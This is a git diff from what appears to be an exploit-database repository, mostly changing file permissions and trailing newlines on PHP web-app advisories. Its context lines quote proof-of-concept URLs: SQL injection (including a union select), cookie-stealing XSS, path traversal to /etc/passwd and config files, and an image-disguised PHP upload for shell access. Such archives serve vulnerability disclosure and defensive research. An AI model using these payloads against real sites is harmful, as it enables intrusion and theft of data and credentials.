a/platforms/php/webapps/37374.txt +++ b/platforms/php/webapps/37374.txt @@ -4,4 +4,4 @@ The Alphacontent component for Joomla! is prone to an SQL-injection vulnerabilit Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_alphacontent&section=weblinks&Itemid=1&lang=de&limitstart=[sqli] \ No newline at end of file +http://www.example.com/index.php?option=com_alphacontent&section=weblinks&Itemid=1&lang=de&limitstart=[sqli] \ No newline at end of file diff --git a/platforms/php/webapps/37375.php b/platforms/php/webapps/37375.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37376.php b/platforms/php/webapps/37376.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37377.php b/platforms/php/webapps/37377.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37378.php b/platforms/php/webapps/37378.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37379.php b/platforms/php/webapps/37379.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37380.php b/platforms/php/webapps/37380.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37381.html b/platforms/php/webapps/37381.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37382.php b/platforms/php/webapps/37382.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37383.php b/platforms/php/webapps/37383.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37387.txt b/platforms/php/webapps/37387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37388.txt b/platforms/php/webapps/37388.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37389.txt b/platforms/php/webapps/37389.txt old mode 100755 new mode 100644 index c8e7975ae..373eec82f --- a/platforms/php/webapps/37389.txt +++ b/platforms/php/webapps/37389.txt @@ -113,6 +113,4 @@ http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=785 The attacker can now log as superlibrarian. Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. -Alice needs to have access to the OPAC interface and to have permissions to create public lists. - - \ No newline at end of file +Alice needs to have access to the OPAC interface and to have permissions to create public lists. \ No newline at end of file diff --git a/platforms/php/webapps/3739.php b/platforms/php/webapps/3739.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37397.html b/platforms/php/webapps/37397.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37398.php b/platforms/php/webapps/37398.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37399.php b/platforms/php/webapps/37399.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37403.php b/platforms/php/webapps/37403.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37404.txt b/platforms/php/webapps/37404.txt old mode 100755 new mode 100644 index a7a6bee28..9dde87af2 --- a/platforms/php/webapps/37404.txt +++ b/platforms/php/webapps/37404.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MediaWiki versions prior to 1.17.5, 1.18.4, and 1.19.1 are vulnerable. -http://www.example.com/wiki/Main_Page?uselang=a%27%20onmouseover=eval(alert(1))%20e=%27 \ No newline at end of file +http://www.example.com/wiki/Main_Page?uselang=a%27%20onmouseover=eval(alert(1))%20e=%27 \ No newline at end of file diff --git a/platforms/php/webapps/37406.php b/platforms/php/webapps/37406.php old mode 100755 new mode 100644 index 75cb4105b..de34b6b4d --- a/platforms/php/webapps/37406.php +++ b/platforms/php/webapps/37406.php @@ -18,4 +18,4 @@ $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/37407.txt b/platforms/php/webapps/37407.txt old mode 100755 new mode 100644 index 4a9c2e230..3bbfc3be7 --- a/platforms/php/webapps/37407.txt +++ b/platforms/php/webapps/37407.txt @@ -8,4 +8,4 @@ ADICO 1.1 is vulnerable; other versions may also be affected. http://www.example.com/car-rent/[PATH]/admin/index.php?job=cars&action=edit&id=[SQL INJECTION] -http://www.example.com/car-rent/[PATH]/admin/index.php?job=calendar&action=month&id=[SQL INJECTION] \ No newline at end of file +http://www.example.com/car-rent/[PATH]/admin/index.php?job=calendar&action=month&id=[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/37408.txt b/platforms/php/webapps/37408.txt old mode 100755 new mode 100644 index 7cad4bdd0..d01405f1d --- a/platforms/php/webapps/37408.txt +++ b/platforms/php/webapps/37408.txt @@ -12,4 +12,4 @@ http://www.example.com/cms/forum.php?orderType=[ASC/DESC]&orderBy=-1 [SQL-INJECT http://www.example.com/cms/forum/admin.php?act=topics&orderType=-1 [SQL-INJECTION]-- http://www.example.com/cms/forum/admin.php?act=topics&orderType=[ASC/DESC]&search=&orderBy=-1 [SQL-INJECTION]-- http://www.example.com/cms/forum/admin.php?act=replies&topic_id=&orderType=-1 [SQL-INJECTION]-- -http://www.example.com/cms/forum/admin.php?act=replies&topic_id=&orderType=[ASC/DESC]&search=&orderBy=-1 [SQL-INJECTION]-- \ No newline at end of file +http://www.example.com/cms/forum/admin.php?act=replies&topic_id=&orderType=[ASC/DESC]&search=&orderBy=-1 [SQL-INJECTION]-- \ No newline at end of file diff --git a/platforms/php/webapps/37409.txt b/platforms/php/webapps/37409.txt old mode 100755 new mode 100644 index 2331b5152..206c497ab --- a/platforms/php/webapps/37409.txt +++ b/platforms/php/webapps/37409.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application, acc NetArt Media Jobs Portal 3.0 is vulnerable; other versions may also be affected. -http://www.example.com/EMPLOYERS/index.php?category=application_management&folder=my&page=details&posting_id=113&apply_id=68+order+%20by+1--%20[SQL INJECTION]-- \ No newline at end of file +http://www.example.com/EMPLOYERS/index.php?category=application_management&folder=my&page=details&posting_id=113&apply_id=68+order+%20by+1--%20[SQL INJECTION]-- \ No newline at end of file diff --git a/platforms/php/webapps/3741.txt b/platforms/php/webapps/3741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37410.php b/platforms/php/webapps/37410.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37411.txt b/platforms/php/webapps/37411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37412.php b/platforms/php/webapps/37412.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37413.txt b/platforms/php/webapps/37413.txt old mode 100755 new mode 100644 index dc103c3d3..bbb59c882 --- a/platforms/php/webapps/37413.txt +++ b/platforms/php/webapps/37413.txt @@ -4,4 +4,4 @@ The JCal Pro Calendar component for Joomla! is prone to an SQL-injection vulnera Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_jcalpro&Itemid=1 [SQL Injection] \ No newline at end of file +http://www.example.com/index.php?option=com_jcalpro&Itemid=1 [SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/37414.txt b/platforms/php/webapps/37414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37415.txt b/platforms/php/webapps/37415.txt old mode 100755 new mode 100644 index e0234b860..a03661108 --- a/platforms/php/webapps/37415.txt +++ b/platforms/php/webapps/37415.txt @@ -27,4 +27,4 @@ http://www.example.com/admin/index.php?page=formdesigner [Persistent Script Code http://www.example.com/admin/index.php?page=comments [Persistent Script Code Inject via Comment text & name Value] -http://www.example.com/admin/index.php?page=submissions [Persistent Script Code Inject via submission name Value] \ No newline at end of file +http://www.example.com/admin/index.php?page=submissions [Persistent Script Code Inject via submission name Value] \ No newline at end of file diff --git a/platforms/php/webapps/37417.php b/platforms/php/webapps/37417.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37418.php b/platforms/php/webapps/37418.php old mode 100755 new mode 100644 index b8cbf2b4d..7a35fd374 --- a/platforms/php/webapps/37418.php +++ b/platforms/php/webapps/37418.php @@ -26,4 +26,4 @@ Shell Access : http://www.example.com/wordpress/wp-content/plugins/lb-mixed-slid lo.php.gif <?php phpinfo(); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/37419.txt b/platforms/php/webapps/37419.txt old mode 100755 new mode 100644 index ebb4894b8..bd1c5322e --- a/platforms/php/webapps/37419.txt +++ b/platforms/php/webapps/37419.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view local files in the context of Wp-ImageZoom 1.0.3 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/wp-imagezoom/download.php?file=../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/wp-imagezoom/download.php?file=../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/37420.txt b/platforms/php/webapps/37420.txt old mode 100755 new mode 100644 index 58088fe96..ca3f22bc3 --- a/platforms/php/webapps/37420.txt +++ b/platforms/php/webapps/37420.txt @@ -4,4 +4,4 @@ VANA CMS is prone to an SQL-injection vulnerability because it fails to sufficie A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - http://www.example.com/general/index.php?recordID=125' \ No newline at end of file + http://www.example.com/general/index.php?recordID=125' \ No newline at end of file diff --git a/platforms/php/webapps/37423.txt b/platforms/php/webapps/37423.txt old mode 100755 new mode 100644 index 62e007d8b..a1b7fa91b --- a/platforms/php/webapps/37423.txt +++ b/platforms/php/webapps/37423.txt @@ -196,4 +196,4 @@ http://192.168.204.135/install/hello.php > Security researcher This is the vulnerability of some web pages -http://seclists.org/fulldisclosure/2015/Jun/47 \ No newline at end of file +http://seclists.org/fulldisclosure/2015/Jun/47 \ No newline at end of file diff --git a/platforms/php/webapps/3743.txt b/platforms/php/webapps/3743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37430.txt b/platforms/php/webapps/37430.txt old mode 100755 new mode 100644 index 32da4a208..cc638d372 --- a/platforms/php/webapps/37430.txt +++ b/platforms/php/webapps/37430.txt @@ -8,4 +8,4 @@ CMS Balitbang 3.5 is vulnerable; other versions may also be affected. http://www.example.com/balitbang/member/user.php?id=guruabsendetail&kd=<script>alert(document.cookie);</script> [XSS] -http://www.example.com/balitbang/admin/admin.php?mode=mengajar_detail&nip=<script>alert(document.cookie);</script> [XSS] \ No newline at end of file +http://www.example.com/balitbang/admin/admin.php?mode=mengajar_detail&nip=<script>alert(document.cookie);</script> [XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37431.php b/platforms/php/webapps/37431.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37432.txt b/platforms/php/webapps/37432.txt old mode 100755 new mode 100644 index 9a3a0f65c..8a53dacc5 --- a/platforms/php/webapps/37432.txt +++ b/platforms/php/webapps/37432.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view local files in the context of Image Gallery 0.9.7.1 is vulnerable; other versions may also be affected. -http://www.example.com/e107_plugins/image_gallery/viewImage.php?name=../../../../e107_config.php&type=album \ No newline at end of file +http://www.example.com/e107_plugins/image_gallery/viewImage.php?name=../../../../e107_config.php&type=album \ No newline at end of file diff --git a/platforms/php/webapps/37433.txt b/platforms/php/webapps/37433.txt old mode 100755 new mode 100644 index be6310798..86dbcc6c5 --- a/platforms/php/webapps/37433.txt +++ b/platforms/php/webapps/37433.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow AdaptCMS 2.0.2 is vulnerable. -http://www.example.com/adapt/index.php?view=search&q=%3Cmarquee%3E%3Cfont%20color=Blue%20size=15%3Eindoushka%3C/font%3E%3C/marquee%3E \ No newline at end of file +http://www.example.com/adapt/index.php?view=search&q=%3Cmarquee%3E%3Cfont%20color=Blue%20size=15%3Eindoushka%3C/font%3E%3C/marquee%3E \ No newline at end of file diff --git a/platforms/php/webapps/37434.txt b/platforms/php/webapps/37434.txt old mode 100755 new mode 100644 index f8ab0d6fe..b224408ef --- a/platforms/php/webapps/37434.txt +++ b/platforms/php/webapps/37434.txt @@ -22,4 +22,4 @@ print "$postResult"; ?> -http://www.example.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/edit.php?file=../../../../../e107_config.php%00 \ No newline at end of file +http://www.example.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/edit.php?file=../../../../../e107_config.php%00 \ No newline at end of file diff --git a/platforms/php/webapps/37435.txt b/platforms/php/webapps/37435.txt old mode 100755 new mode 100644 index 5dea0efe5..511f88eda --- a/platforms/php/webapps/37435.txt +++ b/platforms/php/webapps/37435.txt @@ -4,4 +4,4 @@ web@all is prone to a cross-site scripting vulnerability and a cross-site reques An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible. -http://www.example.com/search.php?_text[title]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/search.php?_text[title]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37436.txt b/platforms/php/webapps/37436.txt old mode 100755 new mode 100644 index dd155db31..131867134 --- a/platforms/php/webapps/37436.txt +++ b/platforms/php/webapps/37436.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Commentics 2.0 is vulnerable; prior versions may also be affected. -http://www.example.com/commentics/commentics/comments/[admin_path]/index.php?p age=edit_page&id="><script>alert(1)</script><!-- \ No newline at end of file +http://www.example.com/commentics/commentics/comments/[admin_path]/index.php?p age=edit_page&id="><script>alert(1)</script><!-- \ No newline at end of file diff --git a/platforms/php/webapps/37437.txt b/platforms/php/webapps/37437.txt old mode 100755 new mode 100644 index de36508d6..70c59e58a --- a/platforms/php/webapps/37437.txt +++ b/platforms/php/webapps/37437.txt @@ -4,4 +4,4 @@ Coppermine Photo Gallery is prone to an SQL-injection vulnerability because it f A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?cat=14 [SQLi] \ No newline at end of file +http://www.example.com/index.php?cat=14 [SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/37438.txt b/platforms/php/webapps/37438.txt old mode 100755 new mode 100644 index 218c15362..995e66580 --- a/platforms/php/webapps/37438.txt +++ b/platforms/php/webapps/37438.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow LogAnalyzer 3.4.3 is vulnerable; other versions may also be vulnerable. -http://www.example.com/?search=Search&highlight="<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/?search=Search&highlight="<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/37439.txt b/platforms/php/webapps/37439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3744.txt b/platforms/php/webapps/3744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37440.txt b/platforms/php/webapps/37440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37443.txt b/platforms/php/webapps/37443.txt old mode 100755 new mode 100644 index 291989bf9..95494efed --- a/platforms/php/webapps/37443.txt +++ b/platforms/php/webapps/37443.txt @@ -4,4 +4,4 @@ The 'com_szallasok' component for Joomla! is prone to an SQL-injection vulnerabi A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_szallasok&mode=8&id=-25 union select 0,1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 \ No newline at end of file +http://www.example.com/index.php?option=com_szallasok&mode=8&id=-25 union select 0,1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 \ No newline at end of file diff --git a/platforms/php/webapps/37444.txt b/platforms/php/webapps/37444.txt old mode 100755 new mode 100644 index 8cf689769..c7053227c --- a/platforms/php/webapps/37444.txt +++ b/platforms/php/webapps/37444.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access Cotonti 0.6.23 is vulnerable; other versions may also be affected. -http://www.example.com/admin.php?m=hits&f=year&v=1[SQLi] \ No newline at end of file +http://www.example.com/admin.php?m=hits&f=year&v=1[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/37445.txt b/platforms/php/webapps/37445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37446.txt b/platforms/php/webapps/37446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3745.txt b/platforms/php/webapps/3745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37450.txt b/platforms/php/webapps/37450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37451.txt b/platforms/php/webapps/37451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37452.txt b/platforms/php/webapps/37452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37453.php b/platforms/php/webapps/37453.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37457.html b/platforms/php/webapps/37457.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37459.txt b/platforms/php/webapps/37459.txt old mode 100755 new mode 100644 index 12b0eb147..efca1a0b4 --- a/platforms/php/webapps/37459.txt +++ b/platforms/php/webapps/37459.txt @@ -8,4 +8,4 @@ Attackers can exploit an arbitrary file-deletion vulnerability with directory-tr Umapresence 2.6.0 is vulnerable; other versions may also be affected. -http://www.example.com/umapresence/umaservices/uma_editor/inc/insert_doc.pop.php?dos=../../style \ No newline at end of file +http://www.example.com/umapresence/umaservices/uma_editor/inc/insert_doc.pop.php?dos=../../style \ No newline at end of file diff --git a/platforms/php/webapps/37460.txt b/platforms/php/webapps/37460.txt old mode 100755 new mode 100644 index 944587baf..b8a859176 --- a/platforms/php/webapps/37460.txt +++ b/platforms/php/webapps/37460.txt @@ -6,4 +6,4 @@ An attacker could exploit these issues to execute arbitrary script code in a use Schoolhos CMS 2.29 is vulnerable; other versions may also be affected. -http://www.example.com/schoolhos/index.php?p=detberita&id=xxx [XSS] \ No newline at end of file +http://www.example.com/schoolhos/index.php?p=detberita&id=xxx [XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37461.txt b/platforms/php/webapps/37461.txt old mode 100755 new mode 100644 index 2ff5e481f..ef55faf6b --- a/platforms/php/webapps/37461.txt +++ b/platforms/php/webapps/37461.txt @@ -4,4 +4,4 @@ DigPHP is prone to a remote file-disclosure vulnerability because it fails to pr An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks. -http://www.example.com/dig.php?action=file&dir= \ No newline at end of file +http://www.example.com/dig.php?action=file&dir= \ No newline at end of file diff --git a/platforms/php/webapps/37464.txt b/platforms/php/webapps/37464.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37466.php b/platforms/php/webapps/37466.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37468.php b/platforms/php/webapps/37468.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37469.txt b/platforms/php/webapps/37469.txt old mode 100755 new mode 100644 index 8bfc7e3d7..479d8fd41 --- a/platforms/php/webapps/37469.txt +++ b/platforms/php/webapps/37469.txt @@ -8,4 +8,4 @@ The following example URIs are available: http://www.example.com/index.php?id -http://www.example.com/_files_/db.log \ No newline at end of file +http://www.example.com/_files_/db.log \ No newline at end of file diff --git a/platforms/php/webapps/3747.txt b/platforms/php/webapps/3747.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37472.php b/platforms/php/webapps/37472.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37474.txt b/platforms/php/webapps/37474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37476.txt b/platforms/php/webapps/37476.txt old mode 100755 new mode 100644 index db9dffae8..ff70552ff --- a/platforms/php/webapps/37476.txt +++ b/platforms/php/webapps/37476.txt @@ -10,4 +10,4 @@ http://www.example.com/mbbcms/?ref=search&q=' + [SQL Injection] http://www.example.com/mbbcms/?mod=article&act=search&q=' + [SQL Injection] http://www.example.com/mbbcms/?ref=search&q= [XSS] -http://www.example.com/mbbcms/?mod=article&act=search&q= [XSS] \ No newline at end of file +http://www.example.com/mbbcms/?mod=article&act=search&q= [XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37479.txt b/platforms/php/webapps/37479.txt old mode 100755 new mode 100644 index 292885d8c..273aa850d --- a/platforms/php/webapps/37479.txt +++ b/platforms/php/webapps/37479.txt @@ -12,4 +12,4 @@ http://www.example.com/test/classifiedscript/admin.php?act=ads&orderType=[SQL-IN http://www.example.com/test/classifiedscript/admin.php?act=comments&ads_id=&orderType=[ASC / DESC ]&search=&orderBy=[SQL-INJECTION] -http://www.example.com/test/classifiedscript/admin.php?act=comments&ads_id=&orderType[SQL-INJECTION] \ No newline at end of file +http://www.example.com/test/classifiedscript/admin.php?act=comments&ads_id=&orderType[SQL-INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/3748.txt b/platforms/php/webapps/3748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37481.txt b/platforms/php/webapps/37481.txt old mode 100755 new mode 100644 index 2e701f97c..f1d08645e --- a/platforms/php/webapps/37481.txt +++ b/platforms/php/webapps/37481.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SocialFit 1.2.2 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%28123%29%3C/script%3E \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%28123%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37482.txt b/platforms/php/webapps/37482.txt old mode 100755 new mode 100644 index f3cc099ff..5e6421a45 --- a/platforms/php/webapps/37482.txt +++ b/platforms/php/webapps/37482.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow custom tables 3.4.4 is vulnerable; prior versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37483.txt b/platforms/php/webapps/37483.txt old mode 100755 new mode 100644 index c33e810b2..f0b258399 --- a/platforms/php/webapps/37483.txt +++ b/platforms/php/webapps/37483.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow church_admin plugin Version 0.33.4.5 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28123%29%3C/script%3E \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28123%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37484.txt b/platforms/php/webapps/37484.txt old mode 100755 new mode 100644 index 37e09212c..67f6171fe --- a/platforms/php/webapps/37484.txt +++ b/platforms/php/webapps/37484.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Knews Multilingual Newsletters 1.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37485.txt b/platforms/php/webapps/37485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37486.txt b/platforms/php/webapps/37486.txt old mode 100755 new mode 100644 index 59a813e03..2df11d1d5 --- a/platforms/php/webapps/37486.txt +++ b/platforms/php/webapps/37486.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view files and execute local scrip sflog! 1.00 is vulnerable; other versions may also be affected. -http://www.example.com/sflog/index.php?blog=admin&section=../../../../../../../etc/&permalink=passwd \ No newline at end of file +http://www.example.com/sflog/index.php?blog=admin&section=../../../../../../../etc/&permalink=passwd \ No newline at end of file diff --git a/platforms/php/webapps/37489.txt b/platforms/php/webapps/37489.txt old mode 100755 new mode 100644 index b7ac074c5..180ca8b9d --- a/platforms/php/webapps/37489.txt +++ b/platforms/php/webapps/37489.txt @@ -10,4 +10,4 @@ http://www.example.com/mgb/admin/admin.php?action=delete&id=[SQLi]&p=1 http://www.example.com/mgb/index.php?p=1â??"</script><script>alert(document.cookie)</script> [XSS] -http://www.example.com/mgb/newentry.php [XSS] \ No newline at end of file +http://www.example.com/mgb/newentry.php [XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3749.txt b/platforms/php/webapps/3749.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37494.txt b/platforms/php/webapps/37494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37497.txt b/platforms/php/webapps/37497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37498.txt b/platforms/php/webapps/37498.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37499.txt b/platforms/php/webapps/37499.txt old mode 100755 new mode 100644 index f9856ef9d..6f09bed08 --- a/platforms/php/webapps/37499.txt +++ b/platforms/php/webapps/37499.txt @@ -17,4 +17,4 @@ http://www.example.com/?s=home&m=home&sudo=%22%3E%3Cimg%20src=http://www.vuln-la http://www.example.com/?s=provphones&m=phones&sudo=su&mac=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL %22%29%20%3C&ip=127.0.0.1&pbx_id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&phone_type=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C [XSS] -http://www.example.com/&mac=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&sudo=su§ion=%2Fprov%2Fcisco [XSS] \ No newline at end of file +http://www.example.com/&mac=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&sudo=su§ion=%2Fprov%2Fcisco [XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3750.txt b/platforms/php/webapps/3750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37500.txt b/platforms/php/webapps/37500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37502.txt b/platforms/php/webapps/37502.txt old mode 100755 new mode 100644 index b14a65285..56f25d3c9 --- a/platforms/php/webapps/37502.txt +++ b/platforms/php/webapps/37502.txt @@ -8,4 +8,4 @@ Elite Bulletin Board 2.1.19 is vulnerable; other versions may also be affected http://www.example.com/ebbv2/groups.php?id=%5c&mode=view http://www.example.com/ebbv2/rssfeed.php?bid=%5c -http://www.example.com/ebbv2/viewboard.php?bid=%5c \ No newline at end of file +http://www.example.com/ebbv2/viewboard.php?bid=%5c \ No newline at end of file diff --git a/platforms/php/webapps/37503.txt b/platforms/php/webapps/37503.txt old mode 100755 new mode 100644 index 534c6d624..cc4c76836 --- a/platforms/php/webapps/37503.txt +++ b/platforms/php/webapps/37503.txt @@ -26,4 +26,4 @@ http://www.example.com/eventcalendar/preview.php?cal_id=2&cal_month=%22%3E%3Cifr http://www.example.com/eventcalendar/preview.php?cal_id=2&cal_month=1&cal_year=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C#oncal -http://www.example.com/eventcalendar/admin.php?act=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C \ No newline at end of file +http://www.example.com/eventcalendar/admin.php?act=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C \ No newline at end of file diff --git a/platforms/php/webapps/37505.txt b/platforms/php/webapps/37505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37506.php b/platforms/php/webapps/37506.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37507.txt b/platforms/php/webapps/37507.txt old mode 100755 new mode 100644 index d52d15999..73ea94aed --- a/platforms/php/webapps/37507.txt +++ b/platforms/php/webapps/37507.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow web@all 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/webatall-2.0/my/kindeditor/?name=%3Cscript%3Ealert%28123%29%3C/script%3E \ No newline at end of file +http://www.example.com/webatall-2.0/my/kindeditor/?name=%3Cscript%3Ealert%28123%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37508.txt b/platforms/php/webapps/37508.txt old mode 100755 new mode 100644 index 5c28e0f4b..9125aea68 --- a/platforms/php/webapps/37508.txt +++ b/platforms/php/webapps/37508.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view local files in the context of Rama Zeiten CMS 0.99 is vulnerable; other versions may also be affected. -http://www.example.com/ramazeiten/download.php?file=../../../../../etc/passwd \ No newline at end of file +http://www.example.com/ramazeiten/download.php?file=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/37509.txt b/platforms/php/webapps/37509.txt old mode 100755 new mode 100644 index f3af8f2b0..8cbc3894e --- a/platforms/php/webapps/37509.txt +++ b/platforms/php/webapps/37509.txt @@ -14,4 +14,4 @@ http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=../../../../. http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=../../../../../../etc/passwd%00 -http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=./configuration.php%00 \ No newline at end of file +http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=./configuration.php%00 \ No newline at end of file diff --git a/platforms/php/webapps/3751.txt 